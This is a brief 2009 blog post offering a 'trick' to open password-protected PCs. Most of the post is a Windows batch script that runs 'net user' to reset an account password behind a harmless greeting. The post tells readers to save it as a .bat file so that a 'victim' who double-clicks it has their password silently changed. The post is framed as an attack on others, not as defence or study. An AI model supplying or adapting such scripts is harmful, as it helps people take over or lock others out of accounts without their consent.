Search This Blog

Monday, January 19, 2009

How to open password protected PC's

A nice trick to open a password protected pc

@echo off
net user "username" "Password wat u want to set"
echo hi how ru
pause


save this with .bat extension and filetype as all type.

When the victims double clicks the file his password gets automatically changed by wat u have given.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx